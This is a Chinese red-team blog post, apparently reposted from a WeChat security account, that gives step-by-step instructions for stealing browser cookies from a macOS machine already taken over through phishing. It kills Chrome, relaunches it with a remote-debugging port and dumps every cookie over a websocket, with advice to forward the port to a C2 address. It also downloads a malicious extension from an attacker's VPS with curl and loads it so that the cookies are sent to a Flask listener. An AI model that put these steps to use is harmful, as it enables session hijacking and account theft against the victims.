mac下的浏览器cookie盗取

admin 2022年4月5日17:33:47安全文章评论49 views3076字阅读10分15秒阅读模式

背景

    当我们通过钓鱼等方式拿到单位员工的个人PC机时,通常需要对主机进行信息收集。而浏览器是一个重要的信息收集点。我们可以收集历史记录、书签寻找靶机。窃取密码登录SSO、内部OA等等关键系统。         但是在MAC下,因为系统的安全性,想要获取密码存在比较大的困难。在macOS上,Google Chrome 的加密密钥存储在 Keychain 中,需要使用用户的明文密码解锁在Windows上,Google Chrome 版本 80+ 使用使用 DPAPI 加密的 AES-256 密钥加密 cookie。解密时不需密码。         windows下密码和cookie盗取比较容易,一般上工具(HackBrowserData)就行,这里不多说。mac下的浏览器密码不好获取。mac下因为系统安全性受限,使用相关工具会弹输入用户密码的框。看下面的弹窗提示,一下就暴露了,一般人也不会点允许。

mac下的浏览器cookie盗取

因此我们得曲线救国,比如说窃取cookie。这里提供两种方法:

思路一:无头浏览器远程调试

    为了便于调试和自动化,chrome内核的浏览器支持远程调试,然后可以直接调用调试接口获取cookie。网上的资料几乎大都是使用--headless无头模式利用,但本人在mac pro、最新版chrome浏览器却无法复现。使用headless无头浏览器模式会爆如下的错误:

mac下的浏览器cookie盗取

在一个老外的文章里找到了原因:
mac下的浏览器cookie盗取


然后curl接口,并无相关数据显示
mac下的浏览器cookie盗取


第一步

  1. ps aux|grep Chrome 观察浏览器是否在运行。

  2. 若浏览器在运行,执行:killall "Google Chrome" 杀掉浏览器进程

  3. 马上在第二步命令后加上--restore-last-session,还原浏览器最近浏览的选项卡。

  4. 若浏览器未在运行,直接执行第二步,获取到cookie后 杀掉进程即可

第二步

    启动chrome内核浏览器,开启指定调试端口

/Applications/Google Chrome.app/Contents/MacOS/Google Chrome --remote-debugging-port=9222 --user-

mac下的浏览器cookie盗取

第三步

查看调试端口 curl -s localhost:9222/json

mac下的浏览器cookie盗取

第四步

    使用相关websocket工具(这里为了方便演示,直接使用了插件Simple WebSocket Client,入侵时候把调试端口用代理转发到本地,localhost改成c2 ip就好。    若不想代理,命令行下websocket的相关工具还有wsc、python模块等);         从第三步获取的结果中,任选一个webSocketDebuggerUrl;    发送{"id": 1, "method": "Network.getAllCookies"},成功获取所有cookie

mac下的浏览器cookie盗取

思路二:命令行加载恶意拓展

    第二个思路来源是网上看到新闻,存在chrome 恶意插件盗取用户的cookie,因此查找相关资料进行学习。令人惊喜的是,有位师傅github有直接写好获取cookie的插件         GitHub 地址:https://github.com/saucer-man/chromegetcookie      因此这里我们直接调用上面的插件脚本进行利用

第一步

    vps起一个flask服务器监听,接受cookies数据
mac下的浏览器cookie盗取

mac下的浏览器cookie盗取


第二步

    使用curl或者wget下载恶意chrome插件文件夹到肉鸡电脑,

  1. curl http://X.X.X.X/cookie.zip -o /tmp/cookie.zip

  2. unzip cookie.zip

第三步

    用户未打开浏览器的情况,或我们直接杀掉浏览器进程:killall "Google Chrome"     然后执行命令,使chromer浏览器加载我们的拓展

/Applications/Google Chrome.app/Contents/MacOS/Google Chrome --remote-debugging-port=9222 --user-

加载后会打开chromer浏览器mac下的浏览器cookie盗取 

vps服务器也同步接收到了数据,保存cookie.json文件在当前目录mac下的浏览器cookie盗取

mac下的浏览器cookie盗取     用户已打开浏览器的时候,因为两个正在运行的 Chrome 实例不能共享同一个用户数据目录,因此用上面方法就行不通了。

    网上有方法是把用户数据复制到另一个目录,但复现未成功,打开的是没用户数据的chrome浏览器。首先使用cp命令复制文件夹到tmp目录

cp -R ~/Library/Application Support/Google/Chrome/Default~/tmp

使用--user-data命令,指定用户数据执行命令

/Applications/Google Chrome.app/Contents/MacOS/Google Chrome --user-data-dir=~/tmp --load-extension=/Users/用户名/Desktop/tools/redteam/chrome_get_cookie

弹出来的是空白浏览器:mac下的浏览器cookie盗取

接收不到cookie

mac下的浏览器cookie盗取 

参考链接

https://saucer-man.com/information_security/787.html

https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e

https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/(firefox)

PS

    chrome用户数据配置文件夹保存路径:

Mac OS X: ~/Library/Application Support/Google/Chrome/DefaultWindows XP: Documents and SettingsusernameLocal SettingsApplication DataGoogleChromeUser DataDefaultWindows 7: C:UsersxxxAppDataLocalGoogleChromeUser DataDefaultLinux: ~/.config/google-chrome/DefaultUbuntu: ~/.config/google-chrome 或 ~/.config/chromium

    kill all "Google Chrome" 关闭chrome浏览器进程的命令           浏览器命令行相关参数:

--headless 无头模式--restore-last-session 浏览器崩溃后,恢复浏览器的最近浏览的选项卡--load-extension 加载的拓展插件文件夹路径--remote-debugging-port=xxx 远程调试的端口--user-data-dir 表示加载用户浏览器数据文件夹,没有指定数据目录,打开的会是全新无痕的chrome

 

关注及时推送最新安全威胁资讯!

mac下的浏览器cookie盗取

mac下的浏览器cookie盗取



干货 | CS绕过vultr特征检测修改算法


 | GitLab未授权RCE(CVE-2021-22205)


 | Apache APISIX Dashboard-RCE工具





好文分享收藏赞一下最美点在看哦

原文始发于微信公众号(渗透安全团队):mac下的浏览器cookie盗取

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月5日17:33:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  mac下的浏览器cookie盗取 http://cn-sec.com/archives/867875.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: